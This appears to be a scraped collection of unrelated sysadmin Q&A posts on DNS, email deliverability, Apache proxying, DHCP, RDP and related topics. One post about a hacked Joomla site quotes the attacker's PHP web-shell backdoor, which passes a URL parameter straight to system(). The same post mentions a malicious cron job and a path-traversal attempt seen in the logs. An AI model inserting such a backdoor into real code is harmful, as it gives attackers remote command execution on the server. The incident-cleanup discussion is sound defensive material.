Tucows isn't a reseller of OpenSRS, they own it - OpenSRS is the domain wholesale reselling branch of Tucows. Other companies then deal with registering domains and selling them to people and businesses.




So, are you a reseller with OpenSRS? What kind of username and password do you have there? It sounds like the original company gave you an end user login to their reseller account to manage your domain. I.e. the domain is still belonging to their account.



I don't think OpenSRS sell to end users directly. So if you have a reseller account where you pay OpenSRS for some domains and the domain is not in it, they haven't transferred it to you properly. If you don't have a reseller account, you aren't in a position to take ownership of the domain anyway and they can't have transferred it to you.



I guess the original registrant was an OpenSRS reseller, and they haven't handed the domain over to you at all, and are still responsible for it even though they think they aren't, and that OpenSRS is waiting on payment from them to make the domain live again.



Your argument is either to convince them that they haven't transferred it to you. Or to get them to confirm with OpenSRS that they have and it hasn't worked.



http://www.tucowsdomains.com/management-and-passwords/findprovider/





The original domain provider denies responsibility.




There is a complaints and disputes procedure, but it doesn't look simple.



http://www.tucowsdomains.com/topic/disputes-and-complaints/



http://en.wikipedia.org/wiki/Domain_Name_System#Domain_name_registration




The organisation ICANN has the primary oversight of domain ownership on the internet, Tucows adhere to their lengthy dispute resolution protocols. But you aren't really disputing ownership - you and the original company agree who ought to own it, they are just being incompetent.


subnet - Subnetting Doubt

I have two PCs connected to a single switch. Default gateway is not configured for both.



PC1




IP Address - 10.3.0.1
Subnet Mask - 255.255.248.0



PC2



IP Address - 10.3.4.1
Subnet Mask - 255.255.252.0



Will they communicate (PING) with each other? As per my understanding, PC1 can ping PC2 successfully while PC2 cannot ping PC1 because PC1 is on a different network. Is it true?




regards,
Abhilash

Thursday, April 20, 2017

storage - How to connect SATA disks to copy large amounts of data from them to HP server running CentOS 6

We have an HP Proliant DL320e running CentOS 6.



We will get SATA hard disks with data in the formats NTFS, FAT, HFS and HFS+ from which we would like to copy the files to the server (read-only), preferably without having to reboot the server each time.



So some data supplier will mail us a hard disk, we connect it to the server, read the data, disconnect the hard disk and return the hard disk via mail. Each disk will have a few terabytes of data. We will simply copy it using cp -R or something similar. We currently assume the suppliers will not send us malicious data. The data will be written to a Synology RAID system that will be able to write the data much faster than we can read it from a single hard disk.




We have an HP RAID-controller "B120i" with several free slots, but probably we cannot use it to read non-raided disks sent to us by customers, correct?



Further we have an internal SATA connector that the seller intended to use to sell us an expensive DVD reader. We did not buy it so that SATA connector must be free.



Now the seller tells us that it is not possible to connect anything but the DVD-player to the internal SATA connector, and that our best option would be to connect the hard disks via USB instead. I have a feeling that USB will be slower than SATA.



Can we use the internal SATA connector, possibly with an extension cable?



Will we need any special drivers that are unavailable on CentOS, unless we connect the disks via USB?




What is the best way to get the data into the server?

Wednesday, April 19, 2017

Is there any difference between Domain controller and Active directory?



If I want to define domain controller then i would say DC is where active directory installed or



Acitve Directory simply means: Secure centralized authentication and management
and domain controller = ADDS + DNS.




But I get confused when i read here that




I also think it is VERY EASY to say DOMAIN CONTROLLER == ACTIVE
DIRECTORY, which isn't quite the case.




I want to know is it correct or wrong? If wrong then what is the difference?


Answer




Just to put it another way that might be helpful is to say that Active Directory is a directory service for Windows domain networks and the Domain Controller is what serves that service on your Windows domain network. So, there is a difference between Active Directory and Domain Controller. One is the service, while the other is what serves that service.


windows server 2008 - DNS and DHCP addresses aren't matching up



Server 2008 R2 DNS and DHCP server (same server).



For some reason over the last few months I've noticed that many of my DNS entries are incorrect. I'll try to remote into a computer via hostname, and I end up at a different workstation than I intended. The only way to remotely find the correct IP is to check the hostname in DHCP and then update the DNS record to correct it.




Is there something I can do to fix this issue with my DNS without having to update each DNS entry manually? Even if I did that I think that this issue would continue to present itself.


Answer



You are likely having an issue with stale records that haven't been removed. Take a look into enabling Scavenging on your DNS zones, if you are utilizing dynamic DNS updates from your clients. Scavenging examines the records and will remove records that have not been updated in the specified time range. Here is some info on Scavenging Settings and how to enable it:



Enable Scavenging



DNS Aging and Scavenging


domain name system - Rewrite URL but have php read old URL




In my platform, each user has their own config file. The file is named by the subdomain they created.



Example:



user1.domain.com
user2.domain.com
user3.domain.com



The system reads the url via $_SERVER['SERVER_NAME'] and grabs the subdomain. It then looks up the appropriate config file based off of the subdomain.



Example:



if the url is user1.domain.com the system looks up user1.config.php.


Each users has the option to use there own domain. I am currently doing this by pointing the A record.



Example:




user 1 points theirDomainName.com to my IP address via their A record


how can I use htaccess so the url reads theirDomainName.com but backend of the platform (php) reads user1.domain.com thus the platform knows to pull the user1.config file


Answer



Instead of making rewrite rules in .htaccess, it would be much simpler to maintain by doing the mapping inside your PHP script.



That array should map the domain name to the username so you'll know how to do your include. If you're afraid of correcting the existing script beyond that, you could even update $_SERVER['SERVER_NAME'] based on it.




You could, for example, do:
'user1.domain.com',
'domain2.com'=>'user2.domain.com',
'domain3.com'=>'user3.domain.com'];



if (!array_key_exists($_SERVER['SERVER_NAME'], $clients)) {
header('Location: http://domain.com/invalidclient');
exit;
}


$_SERVER['SERVER_NAME'] = $clients[$_SERVER['SERVER_NAME']];


While it is not in the best practices to overwrite super globals, nothing prevents it and it gives you a really simple solution.


How can we measure the bandwidth for Ms Dynamics CRM?



We have to measure the bandwidth that Ms Dynamics CRM use. Does anybody know if there is an application for this issue or another way through our server?
(Windows Server 2003 R2)


Answer



There is a nice article on http://blogs.iis.net




Measuring incoming and outgoing bandwidth per Application Pool




IIS has a per Web-Site performance counter that measures bandwidth ("Web Service", "Bytes Received/sec" and Web Service", "Bytes Sent/sec"). The problem is that this only measures the bandwidth for requests that make it to user mode. All requests that get cached by HTTP.SYS in kernel-mode will not be measured.
The good thing is that HTTP.SYS has the same performance counters ("HTTP Service Url Groups", "BytesReceivedRate" and "HTTP Service UrlGroups", "BytesSentRate").




The blog post also contains a PowerShell script that creates a nice output of bandwidth usage of each application pool.


Tuesday, April 18, 2017

amazon ec2 - Can i run multiple web apps on a single EC2 instance

I need to lower my AWS costs and looking for ways to reduce my AWS usage. I currently have a single java/tomcat webapp which I run multiple EC2 instances of with different configurations. I have siteone.com and sitetwo.com each with their own EC2 instances under the same ElasticBeanstalk environment. These instances are load balanced, (I am thinking of removing Load Balancing for cost), and they both require SSL and connections to an RDS instance. They are both currently in the same VPC. To reduce my costs I need to reduce my instances. How can I go about running multiple tomcat web apps on a single EC2 instance. I am the sole dev on this and could use some direction. thanks!

Monday, April 17, 2017

amazon web services - elastic ip addresses and cost

I always understood that you can have one ip for free, then you start paying for it. Also, it has to be associated.




But i need another one for my mailserver, and after reading their documentation word for word, i read it as, per instance.



Is that true? Can i have up to 5 elastic addresses for free as long as they are associated to my instances?




You can have one Elastic IP (EIP) address associated with a running instance at no charge. If you associate additional EIPs with that instance, you will be charged for each additional EIP associated with that instance per hour on a pro rata basis. Additional EIPs are only available in Amazon VPC.


domain name system - How can I verify Windows DNS forwarders are working?

I thought I knew how to do this, but I guess not.



Even the d2 debugging in nslookup doesn't show the actual forwarder being queried.



So...let's say I set up DNS forwarders in a Windows DNS server and then query using nslookup (or something else?) that server for an external FQDN like "www.purpleflowers.com".



Can I actually see where the Windows DNS server is querying its forwarder, which forwarder it ended up using, and the response from that forwarder?

Sunday, April 16, 2017

Postfix: Gmail marking my email as spam

I'm been trying to understand why Gmail is treating the email sent from one of my domain/server as SPAM. I found a lot of threads here about this issue, however I checked the usual suspects like domain keys, spf etc.




My email is accepted by Outlook.com, which from my understanding has a lot more aggressive spam filter.



I tested my config using auth-results@verifier.port25.com and I got this:



SPF check:          pass
DomainKeys check: neutral
DKIM check: pass
Sender-ID check: pass
SpamAssassin check: ham



Everything looks fine.



After sending an email to a gmail account I get this under the headers:



Received-SPF: pass (google.com: domain of user@mydomain.org designates 89.x.x.8 as permitted sender) client-ip=89.x.x.x;
Authentication-Results: mx.google.com;
spf=pass (google.com: domain of user@mydomain.org designates 89.x.x.8 as permitted sender) smtp.mail=user@mydomain.org;
dkim=pass header.i=@mydomain.org



As you can see, the email is passing on spf and dkim without issues on gmail servers.



Finally I checked my server IP, hostname and domain at http://mxtoolbox.com/blacklists.aspx for RBL blocks and they're not listed anywhere.



Why is gmail treating my emails as SPAM? It makes no sense, I've complied with every single good practice.



Other Note:





  • Reverse DNS is also ok;

  • Tests at http://www.allaboutspam.com are green except for Email server is not using BATV format;



Thank you.




SPF TXT records - do I need to include sub domains for an outsourced sender SPF record



Say that I want to send mail from my own servers at example.com.



As I understand it, I can specify the following SPF record and have any server addressed by an A record under example.com included by the SPF record. So evaluation of mail sent from mailserver1.example.com, mailserver2.example.com would result in a pass:



v=spf1 a ~all



If however I am using an outsourced mail sender say wesendmail.com, I would use an SPF record like this:




v=spf1 include:wesendmail.com ~all



My main question is - If wesendmail.com sends mail from servers at mailserver1.wesendmail.com, mailserver2.wesendmail.com, do I need to include additional SPF records for these servers, or are they captured by the above SPF record?



Also, if I do need to include additional records, how would I find out what their mail servers are? NSLOOKUP domain transfer attempts are blocked by most DNS servers.


Answer



The include clause in your SPF record fetches the corresponding SPF record from wesendmail.com and includes that in-line in your record. So assuming that wesendmail configures their record correctly, you don't need to do anything further.


Saturday, April 15, 2017

centos - kernel patch .diff file



i need to apply patch .diff file to kenerl how to apply it which command should i use after i save the patch on patch.diff file
ps patch is
https://bugzilla.redhat.com/show_bug.cgi?id=248716


Answer




You can use the patch tool. The general syntax is as follows:



patch -pnum 


For more info see:



man patch

apache 2.2 - PHP file download sometimes

I have a little problem with my apache centos server with php 5.0 and mysql. When I open multiples files, sometimes, it show de pages .php for download. I think that PHP have a problem, because it happens only when I open many browser windows (like 30). How can I solve this issue?

ubuntu - Apache2 proxy preserve domain name

I'm trying to implement the scheme Browser Client -> Apache2 Proxy -> Tomcat Application Server. Apache2 and Tomcat on separate servers. But the proxy does not work as I expected.

Apache2 virtual host setting:



  
ServerName example.com
ServerAlias www.example.com

ProxyPass /MyApp http://tomcatdomain.com/MyApp
ProxyPassReverse /MyApp tomcatdomain.com/MyApp




if I make a request to open the page in the browser, http://example.com/MyApp, the application opens correctly, but the URL is different - http://tomcatdomain.com/MyApp.
Next, I look at the Ajax request and see that it does not work according to the scheme I expected:



 12:35:20.537 GET https://example.com/MyApp/service/test [HTTP/1.1 302  41ms]
12:35:20.617 GET https://tomcatdomain.com/MyApp/service/test


Expected: [request] client->apache2->tomcat [response] tomcat->apache2->client




Actually: [request] client->apache2 [response] apache2->client [request2] client ->tomcat [response2] tomcat -> client



My first question is how to make the client receive a response from the tomkat with one query?



The next problem with the ProxyPreserveHost parameter - I need to keep the original url(example.com) when opening the application (not tomcatdomain.com). I append ProxyPreserveHost to the appache2 setting:




ServerName example.com
ServerAlias www.example.com


ProxyPreserveHost On

ProxyPass /MyApp http://tomcatdomain.com/MyApp
ProxyPassReverse /MyApp tomcatdomain.com/MyApp



I also prepared the tomkat server.xml:



   

www.example.com




I make a request and what I see in the browser:



The page isn’t redirecting properly
Firefox has detected that the server is redirecting the request for this address in a way that will never complete.




I make AJAX request and I see 22 identical requests that are not answered:



 12:54:48.020 GET https://example.com/MyApp/service/test [HTTP/1.1 302  28ms]
12:54:48.042 GET https://example.com/MyApp/service/test [HTTP/1.1 302 4ms]
... 22 requests!
12:54:48.367 GET https://example.com/MyApp/service/test [HTTP/1.1 302 3ms]


I conclude that the request is not redirected to the tomcat server.




To confirm my guesses, I corrected the Apache2 settings:



  
ServerName example.com
ServerAlias www.example.com

ProxyPreserveHost On

ProxyPass /MyApp http://tomcatdomain.com/MyApp**ABCD**
ProxyPassReverse /MyApp tomcatdomain.com/MyApp**ABCD**




And in browser I see:
Not Found
The requested URL /MyAppABCD was not found on this server.
Apache/2.4.27 (Ubuntu) Server at example.com Port 80



Apache2 searches for URL mapping not on tomcat, but on the same apache2?




Tell me, please, how to implement the scheme, when the browser open the page, the data will be received from Tomcat via Apache2 proxy, and the original URL will be saved? Thanks.

Friday, April 14, 2017

Migrating DHCP from one server and subnet to another, one subnet fails to retrieve addresses

I just attempted to migrate the DHCP service from a 2008r2 server on vlan1 to a 2012r2 server on vlan20. We had the dhcp helpers assigned on the core switch, firewall dhcp relays setup for the any vlans that required it. After the move, the devices on vlan1 could not get an IP address, so same vlan as the old server. All other vlans were able to retrieve addresses from the new server.



My migration process used powershell commands to backup DHCP including leases from the old server and imported them on the new server. Once the new server finished the import I deauthorized the server on vlan1 and authorized the new server on vlan20. The old server remained on as it is still used for other Server Roles.





  • When the devices on vlan1 failed to retrieve addresses, I also disabled DHCP Server in services.msc.

  • I could ping the servers from either vlan.



My WAN person asked, "Did you shut off DHCP on the old one completely? It's on the VLAN and everything will look locally first b4 going through the Relay". Shouldn't the deauthorize and or stopping the service be enough or would there be more to do?



Any ideas what went wrong?



--Edit/Update--

While the relays were setup correctly, and the migration process used was correct, if I recall correctly there was a Global Relay setting that was preventing the vlan 1 from finding the relay on the new vlan. Thanks for the input.

domain name system - Microsoft DNS behaving strangely

I'm having this peculiar issue with Microsoft DNS.



Basically, we have domain.com that's a split horizon setup (external public DNS and internal DNS are both authoritative for separate zones), don't ask me why, it was like this when I got here.



In this AD we have 3 domain controllers, serving as DNS servers for the internal zones. On top of this, we have 2 DNS servers that forwards queries to these AD servers, and cache the results.




Additionally, we have another domain, example.com that's only in our external public DNS servers.



Now to the problem; AD servers have taken an issue with the name subdomain.example.com. The return queries with "domain name can't be found", as an authoritative server does when it doesn't have a record. However, the DNS forwarders for clients do resolve the query.



Externally everything works fine, subdomain.example.com resolves as it should to a CNAME for www3.domain.com



However, the problem is not with the whole zone, it's only with that specific subdomain. www.example.com resolves both internally and externally as a CNAME for www3.domain.com.



So, how can a DNS server that's not authoritative for a zone reply that a record can't be found?




As a workaround, I created a new zone for subdomain.example.com and added an A record that's identical with the one for www3.domain.com. And an hour later this record was gone?



I'm close to giving up and becoming a goat farmer. :)

Thursday, April 13, 2017

windows - Remote Desktop Clipboard Sharing - Security Risk?



If I connect to a server with RDP and share my clipboard with the server, are there any security risks of my clipboard being availble to other people logging onto the same server?



e.g.




  1. I have a password saved in my local clipboard


  2. I connect to the server "example.com" using Remote Desktop, username "administrator".

  3. My local password is now available to paste into the remote desktop session.

  4. I close the RD window without logging off.

  5. Another user logs on via RDP without clipboard sharing enabled or on the actual machine itself as "administrator".

  6. Under normal conditions is my password available for the other user to paste?



My above question is assuming there is nothing installed on the server that will grab clipboard entries and save them, except for what is supplied with Windows as standard. I realise that if I connected to an untrusted or compromised server with clipboard sharing enabled all bets are off. I am asking whether Windows has the built in mechanism to clear the shared clipboard upon disconnection.


Answer



I just tried it using the regular RDP client to a Windows Server guest. With clipboard off, it is "cleared" when a user connects to the guest. With clipboard sharing enabled on connection, it uses the contents of the connecting user's clipboard.




So, there is no security risk in allowing shared clipboards.


Tuesday, April 11, 2017

hosting - mysql database host



Like there's "shared website host", I hope there's a database host.
It's like getting an IP, user name and password and just connecting to that database.




I think that would be better instead of trying to setup such a server - rent dedicated server, configure software (prone to many errors).



So I'm looking for this company that take this seriously and have a cluster (for reliability) of MySQL servers from which I can rent some allocation.



Oh, and I'm looking for this service in Europe.


Answer



I know there are for MongoDB but a remote MySQL setup like that would add a lot of latency in your application. Might not be worth it


Monday, April 10, 2017

email - Sendmail Spamming Recipient

I am using a perl script to send daily status to my gmail account.
For some reason, sendmail seems to be spamming gmail although I am only sending one email
Gmail is complaining about a failed verification, which seems to trigger sending the message to alternate relays. Since all relays point to the same account, it raises a spam flag ( ... receiving messages at rate ...)



This problem is related to the sending host, since sending emails to the same recipient from another host just goes through right away.

The recipient eventually (few hours) gets 5 copies of the original email

Note: Using postfix instead of sendmail works ....

Can anybody point me towards a solution?



Mar 23 07:00:01 myhostname /USR/SBIN/CRON[16720]: (root) CMD (perl /root/daily-check.pl^I)
Mar 23 07:00:01 myhostname /USR/SBIN/CRON[16721]: (smmsp) CMD (test -x /etc/init.d/sendmail && /usr/share/sendmail/sendmail cron-msp)
Mar 23 07:00:01 myhostname sendmail[16742]: r2N601Va016742: from=root@myhostname.isp.net, size=445, class=0, nrcpts=1, msgid=<201303230600.r2N601Va016742@localhost.localdomain>, relay=root@localhost
Mar 23 07:00:01 myhostname sm-mta[16743]: r2N6012b016743: from=, size=680, class=0, nrcpts=1, msgid=<201303230600.r2N601Va016742@localhost.localdomain>, proto=ESMTP, daemon=MTA-v4, relay=localhost.localdomain [127.0.0.1]
Mar 23 07:00:01 myhostname sendmail[16742]: r2N601Va016742: to=myaccount@gmail.com, ctladdr=root@myhostname.isp.net (0/0), delay=00:00:00, xdelay=00:00:00, mailer=relay, pri=30445, relay=[127.0.0.1] [127.0.0.1], dsn=2.0.0, stat=Sent (r2N6012b016743 Message accepted for delivery)

Mar 23 07:00:02 myhostname sm-mta[16745]: STARTTLS=client, relay=aspmx.l.google.com., version=TLSv1/SSLv3, verify=FAIL, cipher=RC4-SHA, bits=128/128
Mar 23 07:00:02 myhostname sm-mta[16745]: r2N6012b016743: to=, ctladdr= (0/0), delay=00:00:01, xdelay=00:00:01, mailer=esmtp, pri=120680, relay=aspmx.l.google.com. [IPv6:2a00:1450:4001:c02::1b], dsn=4.2.1, stat=Deferred: 450-4.2.1 The user you are trying to contact is receiving mail at a rate that
Mar 23 07:00:03 myhostname sm-mta[16745]: STARTTLS=client, relay=alt1.aspmx.l.google.com., version=TLSv1/SSLv3, verify=FAIL, cipher=RC4-SHA, bits=128/128
Mar 23 07:00:03 myhostname sm-mta[16745]: r2N6012b016743: to=, ctladdr= (0/0), delay=00:00:02, xdelay=00:00:02, mailer=esmtp, pri=120680, relay=alt1.aspmx.l.google.com. [IPv6:2a00:1450:4010:c03::1b], dsn=4.2.1, stat=Deferred: 450-4.2.1 The user you are trying to contact is receiving mail at a rate that
Mar 23 07:00:04 myhostname sm-mta[16745]: STARTTLS=client, relay=alt2.aspmx.l.google.com., version=TLSv1/SSLv3, verify=FAIL, cipher=RC4-SHA, bits=128/128
Mar 23 07:00:04 myhostname sm-mta[16745]: r2N6012b016743: to=, ctladdr= (0/0), delay=00:00:03, xdelay=00:00:03, mailer=esmtp, pri=120680, relay=alt2.aspmx.l.google.com. [IPv6:2607:f8b0:400e:c00::1b], dsn=4.2.1, stat=Deferred: 450-4.2.1 The user you are trying to contact is receiving mail at a rate that
Mar 23 07:00:05 myhostname sm-mta[16745]: STARTTLS=client, relay=aspmx3.googlemail.com., version=TLSv1/SSLv3, verify=FAIL, cipher=RC4-SHA, bits=128/128
Mar 23 07:00:06 myhostname sm-mta[16745]: r2N6012b016743: to=, ctladdr= (0/0), delay=00:00:05, xdelay=00:00:05, mailer=esmtp, pri=120680, relay=aspmx3.googlemail.com. [IPv6:2607:f8b0:400e:c00::1b], dsn=4.2.1, stat=Deferred: 450-4.2.1 The user you are trying to contact is receiving mail at a rate that
Mar 23 07:00:07 myhostname sm-mta[16745]: STARTTLS=client, relay=aspmx2.googlemail.com., version=TLSv1/SSLv3, verify=FAIL, cipher=RC4-SHA, bits=128/128
Mar 23 07:00:07 myhostname sm-mta[16745]: r2N6012b016743: to=, ctladdr= (0/0), delay=00:00:06, xdelay=00:00:06, mailer=esmtp, pri=120680, relay=aspmx2.googlemail.com. [IPv6:2a00:1450:4010:c03::1b], dsn=4.2.1, stat=Deferred: 450-4.2.1 The user you are trying to contact is receiving mail at a rate that

security - Site Hacked Using ?cmd=ls




A Joomla site I'm running was hacked the other day. The hacker dropped some files into the tmp directory and was running an HTTP Daemon there somehow (at least that's what my host told me). At any rate, I've been trying to clean up the files they left behind and secure what I can, but in checking my logs I noticed a hit on www.domain.com/?cmd=ls. This seemed strange to me, so I tried it... and lo and behold it lists all the files in the root directory of my site. Can someone explain to me why this is happening and how I stop it? This seems like a huge exploit, which I'd like to eliminate immediately.



Update: In digging I noticed a few extra lines added to my Joomla index.php:



if ($_GET['cmd']!=null) {
system($_GET['cmd']);
}


I've removed these, but am curious to know how the attacker managed to edit these to begin with. Not really sure where to look to make sure I've closed any back doors.




More Updates: First let me say that yes, I realize the proper course of action here is to blow the site away and restore from backup. However I'd prefer to leave that as a last resort since (a) it's a site that depends on community contributions and my backups aren't that recent (my fault, I know) and (b) I'm working on a new version that should be ready soon. But since I seem to be getting some assistance here I'll add some of the other things that I found/did in an attempt to fix this situation.



Found some .kin (or something like that - didn't make note of it and deleted it right away) directory in my /tmp folder which was obviously where this http daemon was running from. I'm assuming that the gunzip (mentioned below) was how this was placed here.



In my error_log files I found the following suspect entries (the "..." is my attempt to remove the path/filenames from this post):



[04-Jul-2010 09:45:58] PHP Fatal error:  Class 'CkformsController../../../../../../../../../../../../../../../proc/self/environ' not found in ... on line 24

[05-Jul-2010 12:31:30] PHP Notice: Undefined index: HTTP_USER_AGENT in ... on line 92


[04-Jul-2010 06:41:52] PHP Warning: rmdir(...) [function.rmdir]: Directory not empty in ... on line 1719


I've updated the CKForms component (which was listed as having a known exploit with the version I was running), as well as another component listed in the HTTP_USER_AGENT message.



In my stat logs I found that the same IP address attempted the ?cmd=ls twice, so I blocked that IP (somewhere in Indonesia).



I updated my Joomla installation to the latest.




I found system.ph and system.php files in my root which had a gunzip/base64 encoded string, which I deleted.



I've gone through all of the directories within the installation where the timestamp is recent to see if any abnormal files exist.



Deleted a cron job pointing to .../tmp/.kin/up2you >/dev/null 2>&1



Also, I'd be concerned that even if I did restore from a backup, whatever exploit used would still exist, so root cause and prevention is really what I'm going for here.


Answer



I strongly disagree with Chris S's claim that all files/directories should be owned by root. There is a reason for the Unix permissions system.




There are two basic ways to run Apache/PHP. One is to run it as the www-data user, and have the files owned by a non-root username. Apache runs as a low-privilege account and must be granted access to particular directories/files in order to write to them. This is why Joomla has the ftp layer, to compensate for this. However, in a shared server environment, the fact that all files need to be world readable makes config files for other sites on that machine easily read.



The other way is to run Apache with PHP running suPHP, which is what CPanel prefers. In this case, Apache runs as a low privilege user, but, all PHP requests are handed to a script that changes the ownership to the username that owns the files. While you can now use Unix permissions to prevent other rogue scripts on the machine to browse your directories, any compromised PHP script is able to be run as your username and as a consequence, modify/deface any of the files owned by your username.



Since you're not well versed in server security, finding well hidden rootkits, etc on the machine would not be a fun task. First, you'd have to know whether the kernel was exploitable (unless you're running a very recent kernel, the answer here is yes), and whether anything had been affected. This particular hack usually occurs through a compromised FTP account at which point they are able to execute scripts. Since you found that code, it also suggests that the 'hacker' using it wasn't very sophisticated. There are many ways that he could have hidden that code and prevented your logs from seeing what he was doing.



mojah is correct. Once they get in, they try to run a script from /dev/shm/.something or /tmp that connects to their IRC network, or, acts as a takeover bot on undernet or another competing network. You'll likely find one or two scripts running, perhaps a cron entry to restart it, and, other remote shells hidden throughout your Joomla installation. Look for files in the /uploads or /images directory named similar to existing files. i.e. img_1034.jpg.php. They will usually hide their irc bot in multiple places that aren't web accessible so that you won't stumble across them when you log in, but, will have stashed their remote shells in places so that they can get back in and rerun their script and have it reconnect to their network.



In any case, the task you're faced with is somewhat tricky. You've got a site that you need to stay online, you lack some of the experience with these situations, and, you just want your site to work.




Take a dump of your database through Joomla's export function, make sure it is a complete dump. Create a second site and import the dump to verify it. Once you are sure you have a good, importable dump, make a backup of the site. Delete all files, reinstall Joomla, basic installation, use the existing MySQL connection information - it might believe you are upgrading, in which case allow it to upgrade. If you are on a VPS somewhere, perhaps have them hand you a fresh image and reinstall.


Sunday, April 9, 2017

nameserver - Why are many DNS servers not returning the namservers for my domain correctly?



My website has become widely inaccessible and I don't know why.




Up until recently I have been serving my website through cloudflare, so was using their nameservers. Recently I started using Route 53, so I changed to Amazon's name servers using my registrar's control panel, and found that my site quickly became unavailable (I am in the UK).



I used https://www.whatsmydns.net and found that some DNS servers around the world were not returning any namservers for my website. It was the same locations every time I tried, including London, Sao Paolo, Germany, New Zealand and parts of the US. Most locations (around 3/4) were fine though.



I was using hover.com as my registrar at the time, and I thought that the problem might have been to do with them, so I switched registrars to Amazon. Once transferred to Amazon, I changed the nameservers back to Cloudflare's nameservers, waited for it to propagate, and checked again on whatsmydns.net. It was showing up green for all locations. Then I changed back to Amazon's nameservers. The problem was exactly the same as before, the nameservers were not returned by DNS queries in the same locations.



I have changed the DNS servers on my Mac laptop, and can access my website when using the following DNS servers:





  • Sky (my broadband provider) - 90.207.238.97 and 90.207.238.99

  • OpenDNS Home - 208.67.222.222 208.67.220.220



But my website is inaccessible when using the following DNS servers




  • Google - 8.8.8.8 and 8.8.4.4

  • Cloudflare - 1.1.1.1 and 1.0.0.1

  • Quad9 - 9.9.9.9 and 149.112.112.112


  • CleanBrowsing - 185.228.168.9 and 185.228.169.9

  • Adguard - 176.103.130.130 and 176.103.130.131

  • Verisign - 64.6.64.6 and 185.253.163.131



The nameservers I am trying to use are:




  • ns-1478.awsdns-56.org

  • ns-1953.awsdns-52.co.uk


  • ns-135.awsdns-16.com

  • ns-893.awsdns-47.net



I have read that some large ISPs have configured their DNS servers to violate rules, such as by indicating that a domain name does not exist just because one of its name servers does not respond. To try and diagnose if this was occurring, and there was a problem with one of the 4 nameservers, I changed yesterday to use just the first 2 nameservers in the list above, intending to then use just the second two if there was still a problem. However, even though this change has had ample time to propagate (EDIT: perhaps not, given the TTL, but it definitely seems slower than when I changed the nameservers between Amazon's and Cloudflare's and vice versa), whatsmydns.net is showing that the vast majority of DNS servers are still returning all 4 nameservers. I am not sure why that is happening.



What is going on! My website is https://www.markfisher.photo.


Answer



I had a quick look and the main problem with your zone seems to be that the delegation from the parent zone (photo) indicates that markfisher.photo is supposed to be signed (DS record present).




markfisher.photo however is not signed at all. The result of this is that any validating resolver will consider all answers bogus and discard them.



To my knowledge Route53 still does not support DNSSEC, which means that if you want to use that DNS service you need to remove any DS records from the delegation (done through your registrar).



Demonstration of the problem in two steps:



$ dig @ns1.uniregistry.net markfisher.photo +norec +dnssec

; <<>> DiG 9.11.13-RedHat-9.11.13-3.fc31 <<>> @ns1.uniregistry.net markfisher.photo +norec +dnssec
; (2 servers found)

;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 55361
;; flags: qr; QUERY: 1, ANSWER: 0, AUTHORITY: 4, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags: do; udp: 4096
; COOKIE: 60e53f6e7a4d79f37a0879a75e14e274510b02d97b10da1c (good)
;; QUESTION SECTION:
;markfisher.photo. IN A


;; AUTHORITY SECTION:
markfisher.photo. 900 IN NS ns-1478.awsdns-56.org.
markfisher.photo. 900 IN NS ns-1953.awsdns-52.co.uk.
markfisher.photo. 900 IN DS 2371 13 2 B1FB8D1E60D7B54027829321A64B612251F95A41C0F10C912FA9FC6A 9EECEEA5
markfisher.photo. 900 IN RRSIG DS 5 2 900 20200206185213 20200107185213 21795 photo. AN2TWw41LL15uX55vfNaQlHvidlpngYb629gSlEyP+A3JiS77NHO5TvJ gI5QF4si5/haBEoABpuVU8opxxC0Jmv3aD09NkwjZXoqikxDqwjzO/PD wNlvHKOb25fgb1+gKj3JaGvqtAD8m+m2xotmxRo74xPmb2XOvEsGUS25 Cxc=

;; Query time: 94 msec
;; SERVER: 2620:57:4000:1::1#53(2620:57:4000:1::1)
;; WHEN: Tue Jan 07 19:56:36 UTC 2020

;; MSG SIZE rcvd: 358

$


(referral with DS record, indicating that the markfisher.photo zone is signed with the matching key)



$ dig @ns-1478.awsdns-56.org markfisher.photo DNSKEY +norec +dnssec

; <<>> DiG 9.11.13-RedHat-9.11.13-3.fc31 <<>> @ns-1478.awsdns-56.org markfisher.photo DNSKEY +norec +dnssec

; (2 servers found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 54714
;; flags: qr aa; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;markfisher.photo. IN DNSKEY


;; AUTHORITY SECTION:
markfisher.photo. 900 IN SOA ns-893.awsdns-47.net. awsdns-hostmaster.amazon.com. 1 7200 900 1209600 86400

;; Query time: 79 msec
;; SERVER: 2600:9000:5305:c600::1#53(2600:9000:5305:c600::1)
;; WHEN: Tue Jan 07 19:58:44 UTC 2020
;; MSG SIZE rcvd: 129

$



(response from the authoritative server, showing that there are no DNSKEY records, nor are there any signatures)




For a quick overview of DNS delegation as well as DNSSEC health, I can recommend Dnsviz.


CentOS Vulnerabilities - Exploits/Payloads




I'm doing an academic work where I have to find vulnerabilities in CentOS and show how to take advantage of those same vulnerabilities.



I'm no hacker and I'm finding this task to be of great difficulty, that is, I see all the security alerts and their descriptions but no explanation of how to take advantage.



Maybe I'm being a little naive but all I want to know is if there is any tool I can use to show that CentOS 5.0 vulnerability XPTO exists and to show it "working".



If possible something like CVE-2007-0001 exploit tool, CVE-2007-0002 payload and so on.



Thanks.



Answer



For locating vulnerabilities, I tend to prefer the more classic approach by default. Bugtraq and announcement lists for the particular software. Change logs, et cetera. Scanners such as OpenVAS can be used for automated verification and testing.



With verifying the scope of impact, it depends on the vulnerability. When attempting to verify scope of impact, often I seek out the initial release and any vendor specific releases for the vulnerability in question. At that point, depending upon the nature of the vulnerability, I would be able to verify by manual action or writing my own script.



If full disclosure, sometimes proof of concept code is provided with the initial report. If not, I would search the Internet and common resources such as Bugtraq and Packet Storm Security.



You are going to find it difficult to find professionals to walk you through exploiting a vulnerability due to the dubious nature of the request. Most vulnerabilities do not require a high level of technical skill to take advantage of.


Friday, April 7, 2017

linux - How to use an encrypted disk without needing an unencrypted boot partition

I would like to know if there is a way to encrypt a linux system which does not require a small unencrypted /boot partition.



In addition I would like to know if encryption can be implemented on an existing unencrypted system in such a manner that it will encrypt "on the fly" whilst a user is using the system. Thus requiring no re-install of the OS.



Right now the solution I use for linux is luks. I typically re-install the OS (backing up and restoring any data that needs to be kept) create a small /boot partition to boot from and all other partitions are encrypted, including swap. I use either kickstart for redhat or preseeding for debian based systems. The install, either encrypted or not is fully automated.




